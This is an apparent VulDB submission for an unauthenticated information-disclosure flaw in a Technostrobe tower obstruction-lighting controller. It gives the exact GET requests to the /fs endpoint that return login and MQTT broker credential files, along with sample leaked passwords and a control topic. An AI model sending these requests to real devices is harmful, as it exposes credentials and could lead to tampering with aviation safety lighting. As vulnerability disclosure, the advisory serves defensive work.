제출 #783324: Technostrobe HI-LED-WR120-G2 Obstruction Lighting Controller 5.5.0.1R6.03.30 Information Disclosure정보

제목	Technostrobe HI-LED-WR120-G2 Obstruction Lighting Controller 5.5.0.1R6.03.30 Information Disclosure
설명	Sensitive files are accessible without authentication via direct HTTP requests. Example Request: GET /config/system.cfg HTTP/1.1 Host: <target> Example Response: username=admin password=admin123 Bug 2.0.1 — Credential File Exposed (/login.cfg) The Request GET http://technostrobe.shiky.demo:58746/fs?file=%2Flogin.cfg URL-decoded: GET /fs?file=/login.cfg ┌─────────────┐ ┌──────────────────┐ │ │ GET /fs?file=/ │ │ │ Attacker │ login.cfg ──────────▶│ /fs endpoint │ │ (no creds) │ │ (no auth check) │ │ │◀──── file contents ───│ │ └─────────────┘ └──────────────────┘ What the Response Looks Like The login.cfg file contains user accounts and their passwords. The passwords are stored in Base64 encoding. # login.cfg — served freely to anyone who asks userId=0001 password=MDAwMTAxNGE0NQ== ← base64 role=admin Bug 2.1.1 — MQTT Broker Configuration Exposed The Request GET http://technostrobe.shiky.demo:58746/fs?file=%2Fconfig%2FMQTTBroker.cfg URL-decoded: GET /fs?file=/config/MQTTBroker.cfg What Is MQTT? ┌─────────────────────────────────────────────────────────────────┐ │ MQTT IN TOWER LIGHTING │ │ │ │ Tower Light ──[MQTT publish]──▶ Broker ──[subscribe]──▶ NOC │ │ │ │ Topics might include: │ │ • tower/lights/status (light on/off/fault) │ │ • tower/psu/voltage (power supply health) │ │ • tower/alarms/active (fault alerts) │ │ • tower/control/command (⚠️ incoming commands) │ └─────────────────────────────────────────────────────────────────┘ What the Config File Contains # /config/MQTTBroker.cfg — served freely to anyone who asks [broker] host = mqtt.operations.example.com port = 1883 clientId = technostrobe-07223277T4O5BH [auth] username = tower_device_01 password = Twr0$ec2018! [topics] publish = tower/hiled/status subscribe= tower/hiled/control Root Cause: The web server exposes internal files without enforcing authentication or access restrictions. Impact: Disclosure of credentials Exposure of configuration data Enables further attacks such as authentication bypass
원천	⚠️ https://github.com/shiky8/my--cve-vulnerability-research/blob/main/my_VulnDB_cves/CVE-TECHNOSTROBE-03-InfoDisclosure.md
사용자	shiky8 (UID 96565)
제출	2026. 03. 20. AM 01:19 (21 날 ago)
모더레이션	2026. 04. 04. PM 04:41 (16 days later)
상태	수락
VulDB 항목	355341 [Technostrobe HI-LED-WR120-G2 5.5.0.1R6.03.30 Configuration Data /fs 파일 정보 공개]
포인트들	20

◂ 이전 개요 다음 ▸

Do you need the next level of professionalism?

Upgrade your account now!